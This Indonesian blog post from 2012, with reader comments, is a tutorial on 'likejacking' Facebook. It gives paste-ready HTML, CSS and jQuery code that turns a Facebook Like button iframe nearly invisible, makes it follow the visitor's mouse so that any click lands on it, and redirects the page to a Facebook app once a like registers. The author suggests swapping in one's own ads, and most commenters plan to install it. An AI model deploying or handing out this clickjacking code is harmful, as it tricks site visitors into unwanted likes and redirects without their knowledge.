Kamis, 26 Januari 2012

Beranda » » Cara Membuat Likejacking Facebook

Cara Membuat Likejacking Facebook




Cara Membuat Likejacking Facebook - Memang facebook tiada hentinya setelah kita sebelumnya membahas yang berhubungan dengan facebook yang namanya "6 Tips Agar Akun Facebook Selamat Dari Hacker" sekarang kita akan membahas kecurangan bentuk like facebook ang dipasang di blog.

Nah.. kita segera akan bisa memasang kode di bawah ini ke dalam HTML/JavaScript dan berlakulah kode di bawah ini:

Tentang bla..bla.bla..
<script src="http://code.jquery.com/jquery-1.5.js"></script> <style>
html, body { margin: 0; padding: 0; width: 100%; height: 100%; overflow: hidden; }
div.wrapper { width: 100%; height: 100%; overflow: auto; }
img.bg { min-height: 100%; min-width: 1024px; width: 100%; height: 100%; position: fixed; top: 0; left: 0;z-index: 0; }
@media screen and (max-width: 1024px) { img.bg { left: 50%; margin-left: -512px; } }
#content { text-align: center; position: absolute; width: 100%; height: 100%; top: 0; left: 0; color: #fff;font-family: 'palatino linotype', palatino; font-weight: normal; text-align: left; text-shadow: 0 1px 0 #000; z-index: 10; }
#content .description { position: relative; width: 580px; left: 50%; margin-left: -290px; }
#content .description h1 { font-size: 32px; }
#content .description .warning { color: #f00; }
#content .description .link, #content .description a { font-size: 22px; color: #fff; text-decoration:underline; }
#content .description .footer, #content .description .footer a { font-size: 10px; }
</style>

<span id="link" class="link">
<div id="content">



</div>
<div id="wrapper" style="position: absolute; opacity: 1; filter: alpha(opacity = 0); margin-left: -50px; z-index:100;">

<iframe src="//www.facebook.com/plugins/like.php?href=http://www.facebook.com/TorayaSurabaya&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowtransparency="true"></iframe>

<script>
FB.Event.subscribe('edge.create',function(response) {window.top.location.href = "http://apps.facebook.com/gandjarexe/";});
</script>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#link" ).mousemove( function( e ) {
$( '#wrapper' ).css( {
top: e.pageY - 10,
left: e.pageX + 20
} );
} );
} )
</script>

</span>

Kalau lu... gentel ganti like dengan iklan lu... tapi ada satu yang kurang baca TOS dulu ... :) 

13 komentar:

  1. nah dah keren nih sob,tinggal efek postnya aja bikin transparan :D

    BalasHapus
  2. @randy oktaran Oke langsung saya coba #Thank's to you saran :)

    BalasHapus
  3. wah ngeri juga... hehe :D
    pasang ahh biar pada like page ane wkwkwkw :D
    Nice share sob :)

    BalasHapus
  4. hehe.. boleh juga nih di coba sob :D

    BalasHapus
  5. wah mau pake tapi gga enak ama yang laen... hehe

    BalasHapus
  6. Sama dengan membohongi visitor kalau begini namanya :D
    #niceshare

    BalasHapus
  7. @Satria-xp hehehe iy gan saya juga gak menerapkan ini cuma share doang siapa tahu ada yang mau menerapkan

    BalasHapus
  8. bookmark dulu nih, mikir dulu mau dipasang atau enggak :D

    BalasHapus
  9. @Tituitbom.Com gk usah mikir langsung aja pake iklan sitti anda wkwkwkwk dijamin puas deh... selanjutnya ... :D

    BalasHapus